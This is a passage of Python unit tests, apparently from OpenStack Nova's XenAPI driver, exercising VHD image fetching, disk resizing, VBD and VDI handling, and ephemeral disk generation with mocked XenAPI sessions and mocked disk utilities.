vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi").AndRaise(exception.FlavorDiskTooSmall)
self.mox.StubOutWithMock(self.session, 'call_xenapi')
self.session.call_xenapi("VDI.get_by_uuid", "vdi").AndReturn("ref")
self.mox.StubOutWithMock(vm_utils, 'destroy_vdi')
vm_utils.destroy_vdi(self.session, "ref")
self.mox.ReplayAll()
self.assertRaises(exception.FlavorDiskTooSmall,
vm_utils._fetch_vhd_image, self.context, self.session,
self.instance, 'image_id')
self.mox.VerifyAll()
def test_fallback_to_default_handler(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(True)
self._stub_bittorrent_download_vhd(raise_exc=RuntimeError)
vm_utils._make_uuid_stack().AndReturn(["uuid_stack"])
vm_utils.get_sr_path(self.session).AndReturn('sr_path')
self._stub_glance_download_vhd()
self.mox.StubOutWithMock(vm_utils, 'safe_find_sr')
vm_utils.safe_find_sr(self.session).AndReturn("sr")
self.mox.StubOutWithMock(vm_utils, '_scan_sr')
vm_utils._scan_sr(self.session, "sr")
self.mox.StubOutWithMock(vm_utils, '_check_vdi_size')
vm_utils._check_vdi_size(self.context, self.session, self.instance,
"vdi")
self.mox.ReplayAll()
self.assertEqual("vdi", vm_utils._fetch_vhd_image(self.context,
self.session, self.instance, 'image_id')['root']['uuid'])
self.mox.VerifyAll()
def test_default_handler_doesnt_fallback_to_itself(self):
cfg.CONF.import_opt('torrent_base_url',
'nova.virt.xenapi.image.bittorrent',
group='xenserver')
self.flags(torrent_base_url='http://foo', group='xenserver')
self.mox.StubOutWithMock(vm_utils, '_image_uses_bittorrent')
vm_utils._image_uses_bittorrent(
self.context, self.instance).AndReturn(False)
self._stub_glance_download_vhd(raise_exc=RuntimeError)
self.mox.ReplayAll()
self.assertRaises(RuntimeError, vm_utils._fetch_vhd_image,
self.context, self.session, self.instance, 'image_id')
self.mox.VerifyAll()
class TestImageCompression(VMUtilsTestBase):
def test_image_compression(self):
# Testing for nova.conf, too low, negative, and a correct value.
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=0, group='xenserver')
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=-6, group='xenserver')
self.assertIsNone(vm_utils.get_compression_level())
self.flags(image_compression_level=6, group='xenserver')
self.assertEqual(vm_utils.get_compression_level(), 6)
class ResizeHelpersTestCase(VMUtilsTestBase):
def test_repair_filesystem(self):
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('e2fsck', '-f', "-y", "fakepath",
run_as_root=True, check_exit_code=[0, 1, 2]).AndReturn(
("size is: 42", ""))
self.mox.ReplayAll()
vm_utils._repair_filesystem("fakepath")
def _call_tune2fs_remove_journal(self, path):
utils.execute("tune2fs", "-O ^has_journal", path, run_as_root=True)
def _call_tune2fs_add_journal(self, path):
utils.execute("tune2fs", "-j", path, run_as_root=True)
def _call_parted(self, path, start, end):
utils.execute('parted', '--script', path, 'rm', '1',
run_as_root=True)
utils.execute('parted', '--script', path, 'mkpart',
'primary', '%ds' % start, '%ds' % end, run_as_root=True)
def test_resize_part_and_fs_down_succeeds(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
utils.execute("resize2fs", partition_path, "10s", run_as_root=True)
self._call_parted(dev_path, 0, 9)
self._call_tune2fs_add_journal(partition_path)
self.mox.ReplayAll()
vm_utils._resize_part_and_fs("fake", 0, 20, 10)
def test_log_progress_if_required(self):
self.mox.StubOutWithMock(vm_utils.LOG, "debug")
vm_utils.LOG.debug(_("Sparse copy in progress, "
"%(complete_pct).2f%% complete. "
"%(left)s bytes left to copy"),
{"complete_pct": 50.0, "left": 1})
current = timeutils.utcnow()
timeutils.set_time_override(current)
timeutils.advance_time_seconds(vm_utils.PROGRESS_INTERVAL_SECONDS + 1)
self.mox.ReplayAll()
vm_utils._log_progress_if_required(1, current, 2)
def test_log_progress_if_not_required(self):
self.mox.StubOutWithMock(vm_utils.LOG, "debug")
current = timeutils.utcnow()
timeutils.set_time_override(current)
timeutils.advance_time_seconds(vm_utils.PROGRESS_INTERVAL_SECONDS - 1)
self.mox.ReplayAll()
vm_utils._log_progress_if_required(1, current, 2)
def test_resize_part_and_fs_down_fails_disk_too_big(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
new_sectors = 10
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
mobj = utils.execute("resize2fs",
partition_path,
"%ss" % new_sectors,
run_as_root=True)
mobj.AndRaise(processutils.ProcessExecutionError)
self.mox.ReplayAll()
self.assertRaises(exception.ResizeError,
vm_utils._resize_part_and_fs, "fake", 0, 20, 10)
def test_resize_part_and_fs_up_succeeds(self):
self.mox.StubOutWithMock(vm_utils, "_repair_filesystem")
self.mox.StubOutWithMock(utils, 'execute')
dev_path = "/dev/fake"
partition_path = "%s1" % dev_path
vm_utils._repair_filesystem(partition_path)
self._call_tune2fs_remove_journal(partition_path)
self._call_parted(dev_path, 0, 29)
utils.execute("resize2fs", partition_path, run_as_root=True)
self._call_tune2fs_add_journal(partition_path)
self.mox.ReplayAll()
vm_utils._resize_part_and_fs("fake", 0, 20, 30)
def test_resize_disk_throws_on_zero_size(self):
self.assertRaises(exception.ResizeError,
vm_utils.resize_disk, "session", "instance", "vdi_ref",
{"root_gb": 0})
def test_auto_config_disk_returns_early_on_zero_size(self):
vm_utils.try_auto_configure_disk("bad_session", "bad_vdi_ref", 0)
class CheckVDISizeTestCase(VMUtilsTestBase):
def setUp(self):
super(CheckVDISizeTestCase, self).setUp()
self.context = 'fakecontext'
self.session = 'fakesession'
self.instance = dict(uuid='fakeinstance')
self.vdi_uuid = 'fakeuuid'
def test_not_too_large(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=1))
self.mox.StubOutWithMock(vm_utils, '_get_vdi_chain_size')
vm_utils._get_vdi_chain_size(self.session,
self.vdi_uuid).AndReturn(1073741824)
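        # A 1073741824-byte (1 GiB) chain exactly fits the 1 GB root disk.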
self.mox.ReplayAll()
vm_utils._check_vdi_size(self.context, self.session, self.instance,
self.vdi_uuid)
def test_too_large(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=1))
self.mox.StubOutWithMock(vm_utils, '_get_vdi_chain_size')
vm_utils._get_vdi_chain_size(self.session,
self.vdi_uuid).AndReturn(11811160065) # 10GB overhead allowed
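        # 1 GiB root + 10 GiB allowed overhead = 11811160064 bytes, so the
        # value above is one byte over the limit and must raise
        # FlavorDiskTooSmall.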
self.mox.ReplayAll()
self.assertRaises(exception.FlavorDiskTooSmall,
vm_utils._check_vdi_size, self.context, self.session,
self.instance, self.vdi_uuid)
def test_zero_root_gb_disables_check(self):
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(self.instance).AndReturn(
dict(root_gb=0))
self.mox.ReplayAll()
vm_utils._check_vdi_size(self.context, self.session, self.instance,
self.vdi_uuid)
class GetInstanceForVdisForSrTestCase(VMUtilsTestBase):
def setUp(self):
super(GetInstanceForVdisForSrTestCase, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
def test_get_instance_vdis_for_sr(self):
vm_ref = fake.create_vm("foo", "Running")
sr_ref = fake.create_sr()
vdi_1 = fake.create_vdi('vdiname1', sr_ref)
vdi_2 = fake.create_vdi('vdiname2', sr_ref)
for vdi_ref in [vdi_1, vdi_2]:
fake.create_vbd(vm_ref, vdi_ref)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
result = list(vm_utils.get_instance_vdis_for_sr(
driver._session, vm_ref, sr_ref))
self.assertEqual([vdi_1, vdi_2], result)
def test_get_instance_vdis_for_sr_no_vbd(self):
vm_ref = fake.create_vm("foo", "Running")
sr_ref = fake.create_sr()
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
result = list(vm_utils.get_instance_vdis_for_sr(
driver._session, vm_ref, sr_ref))
self.assertEqual([], result)
def test_get_vdi_uuid_for_volume_with_sr_uuid(self):
connection_data = get_fake_connection_data(XENSM_TYPE)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
vdi_uuid = vm_utils.get_vdi_uuid_for_volume(
driver._session, connection_data)
self.assertEqual(vdi_uuid, 'falseVDI')
def test_get_vdi_uuid_for_volume_failure(self):
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
def bad_introduce_sr(session, sr_uuid, label, sr_params):
return None
self.stubs.Set(volume_utils, 'introduce_sr', bad_introduce_sr)
connection_data = get_fake_connection_data(XENSM_TYPE)
self.assertRaises(exception.NovaException,
vm_utils.get_vdi_uuid_for_volume,
driver._session, connection_data)
def test_get_vdi_uuid_for_volume_from_iscsi_vol_missing_sr_uuid(self):
connection_data = get_fake_connection_data(ISCSI_TYPE)
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
vdi_uuid = vm_utils.get_vdi_uuid_for_volume(
driver._session, connection_data)
self.assertIsNotNone(vdi_uuid)
class VMRefOrRaiseVMFoundTestCase(VMUtilsTestBase):
def test_lookup_call(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn('ignored')
mock.ReplayAll()
vm_utils.vm_ref_or_raise('session', 'somename')
mock.VerifyAll()
def test_return_value(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup(mox.IgnoreArg(), mox.IgnoreArg()).AndReturn('vmref')
mock.ReplayAll()
self.assertEqual(
'vmref', vm_utils.vm_ref_or_raise('session', 'somename'))
mock.VerifyAll()
class VMRefOrRaiseVMNotFoundTestCase(VMUtilsTestBase):
def test_exception_raised(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn(None)
mock.ReplayAll()
self.assertRaises(
exception.InstanceNotFound,
lambda: vm_utils.vm_ref_or_raise('session', 'somename')
)
mock.VerifyAll()
def test_exception_msg_contains_vm_name(self):
mock = mox.Mox()
mock.StubOutWithMock(vm_utils, 'lookup')
vm_utils.lookup('session', 'somename').AndReturn(None)
mock.ReplayAll()
try:
vm_utils.vm_ref_or_raise('session', 'somename')
except exception.InstanceNotFound as e:
self.assertTrue(
'somename' in str(e))
mock.VerifyAll()
class BittorrentTestCase(VMUtilsTestBase):
def setUp(self):
super(BittorrentTestCase, self).setUp()
self.context = context.get_admin_context()
def test_image_uses_bittorrent(self):
instance = {'system_metadata': {'image_bittorrent': True}}
self.flags(torrent_images='some', group='xenserver')
self.assertTrue(vm_utils._image_uses_bittorrent(self.context,
instance))
def _test_create_image(self, cache_type):
instance = {'system_metadata': {'image_cache_in_nova': True}}
self.flags(cache_images=cache_type, group='xenserver')
was = {'called': None}
def fake_create_cached_image(*args):
was['called'] = 'some'
return {}
self.stubs.Set(vm_utils, '_create_cached_image',
fake_create_cached_image)
def fake_fetch_image(*args):
was['called'] = 'none'
return {}
self.stubs.Set(vm_utils, '_fetch_image',
fake_fetch_image)
vm_utils._create_image(self.context, None, instance,
'foo', 'bar', 'baz')
self.assertEqual(was['called'], cache_type)
def test_create_image_cached(self):
self._test_create_image('some')
def test_create_image_uncached(self):
self._test_create_image('none')
class ShutdownTestCase(VMUtilsTestBase):
def test_hardshutdown_should_return_true_when_vm_is_shutdown(self):
self.mock = mox.Mox()
session = FakeSession()
instance = "instance"
vm_ref = "vm-ref"
self.mock.StubOutWithMock(vm_utils, 'is_vm_shutdown')
vm_utils.is_vm_shutdown(session, vm_ref).AndReturn(True)
self.mock.StubOutWithMock(vm_utils, 'LOG')
self.assertTrue(vm_utils.hard_shutdown_vm(
session, instance, vm_ref))
def test_cleanshutdown_should_return_true_when_vm_is_shutdown(self):
self.mock = mox.Mox()
session = FakeSession()
instance = "instance"
vm_ref = "vm-ref"
self.mock.StubOutWithMock(vm_utils, 'is_vm_shutdown')
vm_utils.is_vm_shutdown(session, vm_ref).AndReturn(True)
self.mock.StubOutWithMock(vm_utils, 'LOG')
self.assertTrue(vm_utils.clean_shutdown_vm(
session, instance, vm_ref))
class CreateVBDTestCase(VMUtilsTestBase):
def setUp(self):
super(CreateVBDTestCase, self).setUp()
self.session = FakeSession()
self.mock = mox.Mox()
self.mock.StubOutWithMock(self.session, 'call_xenapi')
self.vbd_rec = self._generate_vbd_rec()
def _generate_vbd_rec(self):
vbd_rec = {}
vbd_rec['VM'] = 'vm_ref'
vbd_rec['VDI'] = 'vdi_ref'
vbd_rec['userdevice'] = '0'
vbd_rec['bootable'] = False
vbd_rec['mode'] = 'RW'
vbd_rec['type'] = 'disk'
vbd_rec['unpluggable'] = True
vbd_rec['empty'] = False
vbd_rec['other_config'] = {}
vbd_rec['qos_algorithm_type'] = ''
vbd_rec['qos_algorithm_params'] = {}
vbd_rec['qos_supported_algorithms'] = []
return vbd_rec
def test_create_vbd_default_args(self):
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", "vdi_ref", 0)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_create_vbd_osvol(self):
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.session.call_xenapi('VBD.add_to_other_config', "vbd_ref",
"osvol", "True")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", "vdi_ref", 0,
osvol=True)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_create_vbd_extra_args(self):
self.vbd_rec['VDI'] = 'OpaqueRef:NULL'
self.vbd_rec['type'] = 'a'
self.vbd_rec['mode'] = 'RO'
self.vbd_rec['bootable'] = True
self.vbd_rec['empty'] = True
self.vbd_rec['unpluggable'] = False
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", None, 0,
vbd_type="a", read_only=True, bootable=True,
empty=True, unpluggable=False)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_attach_cd(self):
self.mock.StubOutWithMock(vm_utils, 'create_vbd')
vm_utils.create_vbd(self.session, "vm_ref", None, 1,
vbd_type='cd', read_only=True, bootable=True,
empty=True, unpluggable=False).AndReturn("vbd_ref")
self.session.call_xenapi('VBD.insert', "vbd_ref", "vdi_ref")
self.mock.ReplayAll()
result = vm_utils.attach_cd(self.session, "vm_ref", "vdi_ref", 1)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
class UnplugVbdTestCase(VMUtilsTestBase):
@mock.patch.object(greenthread, 'sleep')
def test_unplug_vbd_works(self, mock_sleep):
session = mock.Mock()
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
vm_utils.unplug_vbd(session, vbd_ref, vm_ref)
session.call_xenapi.assert_called_once_with('VBD.unplug', vbd_ref)
self.assertEqual(0, mock_sleep.call_count)
def test_unplug_vbd_raises_unexpected_error(self):
session = mock.Mock()
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
session.call_xenapi.side_effect = test.TestingException()
self.assertRaises(test.TestingException, vm_utils.unplug_vbd,
                          session, vbd_ref, vm_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def test_unplug_vbd_already_detached_works(self):
error = "DEVICE_ALREADY_DETACHED"
session = _get_fake_session_and_exception(error)
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
vm_utils.unplug_vbd(session, vbd_ref, vm_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def test_unplug_vbd_already_raises_unexpected_xenapi_error(self):
session = _get_fake_session_and_exception("")
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
self.assertRaises(volume_utils.StorageError, vm_utils.unplug_vbd,
session, vbd_ref, vm_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def _test_uplug_vbd_retries(self, mock_sleep, error):
session = _get_fake_session_and_exception(error)
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
self.assertRaises(volume_utils.StorageError, vm_utils.unplug_vbd,
                          session, vbd_ref, vm_ref)
self.assertEqual(11, session.call_xenapi.call_count)
self.assertEqual(10, mock_sleep.call_count)
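        # i.e. unplug_vbd keeps retrying on the given error: 11 XenAPI
        # attempts with 10 sleeps in between before giving up with a
        # StorageError.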
@mock.patch.object(greenthread, 'sleep')
def test_uplug_vbd_retries_on_rejected(self, mock_sleep):
self._test_uplug_vbd_retries(mock_sleep,
"DEVICE_DETACH_REJECTED")
@mock.patch.object(greenthread, 'sleep')
def test_uplug_vbd_retries_on_internal_error(self, mock_sleep):
self._test_uplug_vbd_retries(mock_sleep,
"INTERNAL_ERROR")
class VDIOtherConfigTestCase(VMUtilsTestBase):
"""Tests to ensure that the code is populating VDI's `other_config`
    attribute with the correct metadata.
"""
def setUp(self):
super(VDIOtherConfigTestCase, self).setUp()
class _FakeSession():
def call_xenapi(self, operation, *args, **kwargs):
# VDI.add_to_other_config -> VDI_add_to_other_config
method = getattr(self, operation.replace('.', '_'), None)
if method:
return method(*args, **kwargs)
self.operation = operation
self.args = args
self.kwargs = kwargs
self.session = _FakeSession()
self.context = context.get_admin_context()
self.fake_instance = {'uuid': 'aaaa-bbbb-cccc-dddd',
'name': 'myinstance'}
def test_create_vdi(self):
# Some images are registered with XenServer explicitly by calling
# `create_vdi`
vm_utils.create_vdi(self.session, 'sr_ref', self.fake_instance,
'myvdi', 'root', 1024, read_only=True)
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, self.session.args[0]['other_config'])
def test_create_image(self):
# Other images are registered implicitly when they are dropped into
# the SR by a dom0 plugin or some other process
self.flags(cache_images='none', group='xenserver')
def fake_fetch_image(*args):
return {'root': {'uuid': 'fake-uuid'}}
self.stubs.Set(vm_utils, '_fetch_image', fake_fetch_image)
other_config = {}
def VDI_add_to_other_config(ref, key, value):
other_config[key] = value
def VDI_get_record(ref):
return {'other_config': {}}
# Stubbing on the session object and not class so we don't pollute
# other tests
self.session.VDI_add_to_other_config = VDI_add_to_other_config
self.session.VDI_get_record = VDI_get_record
vm_utils._create_image(self.context, self.session, self.fake_instance,
'myvdi', 'image1', vm_utils.ImageType.DISK_VHD)
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, other_config)
def test_import_migrated_vhds(self):
# Migrated images should preserve the `other_config`
other_config = {}
def VDI_add_to_other_config(ref, key, value):
other_config[key] = value
def VDI_get_record(ref):
return {'other_config': {}}
def call_plugin_serialized(*args, **kwargs):
return {'root': {'uuid': 'aaaa-bbbb-cccc-dddd'}}
# Stubbing on the session object and not class so we don't pollute
# other tests
self.session.VDI_add_to_other_config = VDI_add_to_other_config
self.session.VDI_get_record = VDI_get_record
self.session.call_plugin_serialized = call_plugin_serialized
self.stubs.Set(vm_utils, 'get_sr_path', lambda *a, **k: None)
self.stubs.Set(vm_utils, 'scan_default_sr', lambda *a, **k: None)
vm_utils._import_migrated_vhds(self.session, self.fake_instance,
"disk_label", "root", "vdi_label")
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, other_config)
class GenerateDiskTestCase(VMUtilsTestBase):
def setUp(self):
super(GenerateDiskTestCase, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.session.is_local_connection = False
self.vm_ref = fake.create_vm("foo", "Running")
def tearDown(self):
super(GenerateDiskTestCase, self).tearDown()
fake.destroy_vm(self.vm_ref)
def _expect_parted_calls(self):
self.mox.StubOutWithMock(utils, "execute")
self.mox.StubOutWithMock(utils, "trycmd")
self.mox.StubOutWithMock(vm_utils, "destroy_vdi")
self.mox.StubOutWithMock(vm_utils.os.path, "exists")
if self.session.is_local_connection:
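            # Local (dom0) connections map partitions via kpartx under
            # /dev/mapper and tolerate non-zero parted exit codes; remote
            # sessions do not.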
utils.execute('parted', '--script', '/dev/fakedev', 'mklabel',
'msdos', check_exit_code=False, run_as_root=True)
utils.execute('parted', '--script', '/dev/fakedev', '--', 'mkpart',
'primary', '0', '-0',
check_exit_code=False, run_as_root=True)
vm_utils.os.path.exists('/dev/mapper/fakedev1').AndReturn(True)
utils.trycmd('kpartx', '-a', '/dev/fakedev',
discard_warnings=True, run_as_root=True)
else:
utils.execute('parted', '--script', '/dev/fakedev', 'mklabel',
'msdos', check_exit_code=True, run_as_root=True)
utils.execute('parted', '--script', '/dev/fakedev', '--', 'mkpart',
'primary', '0', '-0',
check_exit_code=True, run_as_root=True)
def _check_vdi(self, vdi_ref, check_attached=True):
vdi_rec = self.session.call_xenapi("VDI.get_record", vdi_ref)
self.assertEqual(str(10 * unit.Mi), vdi_rec["virtual_size"])
if check_attached:
vbd_ref = vdi_rec["VBDs"][0]
vbd_rec = self.session.call_xenapi("VBD.get_record", vbd_ref)
self.assertEqual(self.vm_ref, vbd_rec['VM'])
else:
self.assertEqual(0, len(vdi_rec["VBDs"]))
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_with_no_fs_given(self):
self._expect_parted_calls()
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "user", 10, None)
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_swap(self):
self._expect_parted_calls()
utils.execute('mkswap', '/dev/fakedev1', run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "swap", 10, "linux-swap")
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ephemeral(self):
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/fakedev1',
run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "ephemeral", 10, "ext4")
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ensure_cleanup_called(self):
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/fakedev1',
run_as_root=True).AndRaise(test.TestingException)
vm_utils.destroy_vdi(self.session, mox.IgnoreArg())
self.mox.ReplayAll()
self.assertRaises(test.TestingException, vm_utils._generate_disk,
self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "ephemeral", 10, "ext4")
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ephemeral_local_not_attached(self):
self.session.is_local_connection = True
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/mapper/fakedev1',
run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
None, "2", "name", "ephemeral", 10, "ext4")
self._check_vdi(vdi_ref, check_attached=False)
class GenerateEphemeralTestCase(VMUtilsTestBase):
def setUp(self):
super(GenerateEphemeralTestCase, self).setUp()
self.session = "session"
self.instance = "instance"
self.vm_ref = "vm_ref"
self.name_label = "name"
self.ephemeral_name_label = "name ephemeral"
self.userdevice = 4
self.mox.StubOutWithMock(vm_utils, "_generate_disk")
self.mox.StubOutWithMock(vm_utils, "safe_destroy_vdis")
def test_get_ephemeral_disk_sizes_simple(self):
result = vm_utils.get_ephemeral_disk_sizes(20)
expected = [20]
self.assertEqual(expected, list(result))
def test_get_ephemeral_disk_sizes_three_disks_2000(self):
result = vm_utils.get_ephemeral_disk_sizes(4030)
expected = [2000, 2000, 30]
self.assertEqual(expected, list(result))
def test_get_ephemeral_disk_sizes_two_disks_1024(self):
result = vm_utils.get_ephemeral_disk_sizes(2048)
expected = [1024, 1024]
self.assertEqual(expected, list(result))
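        # As exercised above: sizes are chunked at 2000 GB, except exact
        # multiples of 1024 GB, which are chunked at 1024 GB.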
def _expect_generate_disk(self, size, device, name_label):
vm_utils._generate_disk(self.session, self.instance, self.vm_ref,
str(device), name_label, 'ephemeral',
size * 1024, None).AndReturn(device)
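        # generate_ephemeral passes sizes to _generate_disk in MiB, hence
        # size * 1024 for a size expressed in GiB.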
def test_generate_ephemeral_adds_one_disk(self):
self._expect_generate_disk(20, self.userdevice,
self.ephemeral_name_label)
self.mox.ReplayAll()
vm_utils.generate_ephemeral(self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 20)
def test_generate_ephemeral_adds_multiple_disks(self):
self._expect_generate_disk(2000, self.userdevice,
self.ephemeral_name_label)
self._expect_generate_disk(2000, self.userdevice + 1,
self.ephemeral_name_label + " (1)")
self._expect_generate_disk(30, self.userdevice + 2,
self.ephemeral_name_label + " (2)")
self.mox.ReplayAll()
vm_utils.generate_ephemeral(self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 4030)
def test_generate_ephemeral_cleans_up_on_error(self):
self._expect_generate_disk(1024, self.userdevice,
self.ephemeral_name_label)
self._expect_generate_disk(1024, self.userdevice + 1,
self.ephemeral_name_label + " (1)")
vm_utils._generate_disk(self.session, self.instance, self.vm_ref,
str(self.userdevice + 2), "name ephemeral (2)", 'ephemeral',
unit.Mi, None).AndRaise(exception.NovaException)
vm_utils.safe_destroy_vdis(self.session, [4, 5])
self.mox.ReplayAll()
self.assertRaises(exception.NovaException, vm_utils.generate_ephemeral,
self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 4096)
class FakeFile(object):
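    """Records seek() calls so the stream tests can assert write offsets."""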
def __init__(self):
self._file_operations = []
def seek(self, offset):
self._file_operations.append((self.seek, offset))
class StreamDiskTestCase(VMUtilsTestBase):
def setUp(self):
import __builtin__
super(StreamDiskTestCase, self).setUp()
self.mox.StubOutWithMock(vm_utils.utils, 'make_dev_path')
self.mox.StubOutWithMock(vm_utils.utils, 'temporary_chown')
self.mox.StubOutWithMock(vm_utils, '_write_partition')
# NOTE(matelakat): This might hide the fail reason, as test runners
# are unhappy with a mocked out open.
self.mox.StubOutWithMock(__builtin__, 'open')
self.image_service_func = self.mox.CreateMockAnything()
def test_non_ami(self):
fake_file = FakeFile()
vm_utils.utils.make_dev_path('dev').AndReturn('some_path')
vm_utils.utils.temporary_chown(
'some_path').AndReturn(contextified(None))
open('some_path', 'wb').AndReturn(contextified(fake_file))
self.image_service_func(fake_file)
self.mox.ReplayAll()
vm_utils._stream_disk("session", self.image_service_func,
vm_utils.ImageType.KERNEL, None, 'dev')
self.assertEqual([(fake_file.seek, 0)], fake_file._file_operations)
def test_ami_disk(self):
fake_file = FakeFile()
vm_utils._write_partition("session", 100, 'dev')
vm_utils.utils.make_dev_path('dev').AndReturn('some_path')
vm_utils.utils.temporary_chown(
'some_path').AndReturn(contextified(None))
open('some_path', 'wb').AndReturn(contextified(fake_file))
self.image_service_func(fake_file)
self.mox.ReplayAll()
vm_utils._stream_disk("session", self.image_service_func,
vm_utils.ImageType.DISK, 100, 'dev')
self.assertEqual(
[(fake_file.seek, vm_utils.MBR_SIZE_BYTES)],
fake_file._file_operations)
class VMUtilsSRPath(VMUtilsTestBase):
def setUp(self):
super(VMUtilsSRPath, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.session.is_local_connection = False
def test_defined(self):
self.mox.StubOutWithMock(vm_utils, "safe_find_sr")
self.mox.StubOutWithMock(self.session, "call_xenapi")
vm_utils.safe_find_sr(self.session).AndReturn("sr_ref")
self.session.host_ref = "host_ref"
self.session.call_xenapi('PBD.get_all_records_where',
'field "host"="host_ref" and field "SR"="sr_ref"').AndReturn(
{'pbd_ref': {'device_config': {'path': 'sr_path'}}})
self.mox.ReplayAll()
self.assertEqual(vm_utils.get_sr_path(self.session), "sr_path")
def test_default(self):
self.mox.StubOutWithMock(vm_utils, "safe_find_sr")
self.mox.StubOutWithMock(self.session, "call_xenapi")
vm_utils.safe_find_sr(self.session).AndReturn("sr_ref")
self.session.host_ref = "host_ref"
self.session.call_xenapi('PBD.get_all_records_where',
'field "host"="host_ref" and field "SR"="sr_ref"').AndReturn(
{'pbd_ref': {'device_config': {}}})
self.session.call_xenapi("SR.get_record", "sr_ref").AndReturn(
